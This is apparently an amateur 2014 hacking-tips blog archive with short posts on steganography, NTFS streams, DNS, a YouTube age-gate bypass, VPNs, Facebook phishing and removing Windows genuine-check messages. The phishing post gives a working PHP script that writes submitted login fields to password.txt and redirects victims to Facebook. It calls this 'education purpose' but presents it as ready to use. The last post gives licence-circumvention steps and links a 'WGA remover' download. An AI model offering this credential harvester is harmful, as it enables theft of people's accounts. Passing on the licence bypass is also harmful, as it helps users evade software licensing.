Thursday, 31 July 2014

data hiding behind image (steganography)

Steganography is a method  of  hiding data in another message so that the very existence of  the data is concealed . Steganography is mainly used by hiding message in graphic images  .The least significant bit of each byte of the image  can be replaced with bits of the secret message .


lets see how  can  be hide message  behind the image.

required > one secret message txt file and  main image  file

* put the  secret.txt and  main.jpg on  the desktop
 this  is  secret  message  name as  secret.txt file  and  another  is  image  file  behind  which secret message are to hide in  my  case i  am using  the  image  file name  as  main.jpg


* open cmd (command prompt)
* type "cd Desktop"  (withot quetetion)
* type again  "copy /b main.jpg + secret.txt  steg.jpg

Tuesday, 15 July 2014

Hide data using NTFS stream.


NTFS file system in windows allows you to store data behind a file name with the use of a stream name it's not detectable browsing the file system  any where within windows . It can be access it with secret key which are name of the stream
NTFS file system stream contain the data that is written to a file .


Saturday, 14 June 2014

DNS HACKING

>> DNS HACKING <<
1 DNS BASICS
2 RESOURCE RECORDS AND THE ZONE FILE
3 DNS LOOKUP AND  REVERSE  DNS  LOOKUP
4 DNS ZONE TRANSFER                  
5 WHY SECURITY ISSUE OF ZONE TRANSFERING
6 CONCLUSION


1          Dns Basics:- DNS converts human readable domain names into IP-addresses. This is because domain names are much easier to remember than IP-addresses. This process may take place through a local cache or through a zone file that is present on the server. A zone file is a file on the server that contains entries for different Resource Records (RR).
This  process can be  understand by this  example let’s assume  that  you write in  URL  bar of  browser “www.google.com”  the  this  query first  goes to DNS  server  their  resolve  the site  name  in Ip address and  then  goes  to  query for   web  page   of  google com  to  web. server.
                                                                                  It’s not  easy  task  to  remember every IP  address  of various  web site. so  there  DNS  resolver  work  to  resolve  website  name into  IP  address .
Ex. (Generally all people stored  phone  no.  by particular  person’s  name  )   .
                                                                                                                     

Wednesday, 30 April 2014

Bypass Age Restrictions On YouTube Videos.


you  want  to  watch video ever on  youtube  but couldn't  becuase it is age  restricted  and  may  be  you  have no  account  . so  this  article  will  teach you how  to  bypass restriction on youtube.


here  url  is  http://www.youtube.com/watch?v=MlPH_ycy62s

from here replace   watch?v=  by  v/  and  press enter

you have done it 

enjoy yourself :)

Thursday, 17 April 2014

WORKING AS ANNONYMOUS USING VPN ( virtual private network)..!




what is  vpn  and  how   is   it  usefull  ?

A virtual private network (VPN) extends a private network across a public  network, such as the internet. It enables a computer to send and receive data across shared or public networks as if it is directly connected to the private network, while benefiting from the functionality, security and management policies of the private network
Consumers use a private VPN service, also known as a VPN tunnel, to protect their online activity and identity. By using an anonymous VPN service, a user's Internet traffic and data remain encrypted which prevents eavesdroppers from sniffing Internet activity.  A VPN service is especially useful when accessing public wi-fi, hotspot because the public wireless services might not be secure. In addition to public Wi-Fi security, a private VPN service also provides consumers with uncensored Internet access and can help prevent data theft and unblock websites.



Monday, 14 April 2014

FACEBOOK account hack and prevention to hack. ....!(PHISHING METHOD)

Hi  guys,
              this  tutorial  is  only education purpose  today  i m going  to tell  you  how  to  hack  facebook  acount and   preventing  to  himself   be  victim  ..

what is  phising  ?
Phishing is the act of attempting to acquire sensitive  information such as usernames,passwords, and  credit cards details (and sometimes, indirectly money) by masquerading as a trustworthy entity in an electronic communication.

1. copy  the  following  code and  paste  in   notepad

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("password.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Thursday, 10 April 2014

REMOVING "WINDOWS IS NOT GENUINE".........!

hi guys,
              we use generally free available windows  o.s  and  after some days or months it show  the  "windows is not genuine  get  genuine  now"  with black  screen  .  It's  look  so irritable  and  today  i'll   explain  how  get remove this  message .......... :)


1. open  the cmd  "run as administrator"

2.and type " slmgr -rearm " (without quotation mark)

3.restart system  and u will find  there is not any message on  bottom corner of  monitor.........

**//this  trick  increase time  of  genuine  of  o.s  only  not permanent //**

so can use the  tool  "wga remover "..!

https://www.dropbox.com/s/hlpl1tsrunwy8wu/Windows%20Genuine%20Hack.zip

WGA tests the authenticity of Windows every day, collects and conveys data to Microsoft server even if according to all indications everything is ok with the license. In other words, its main task is of more spy character that consists in collecting of information behind your back.

take care enjoy  yourself..... :)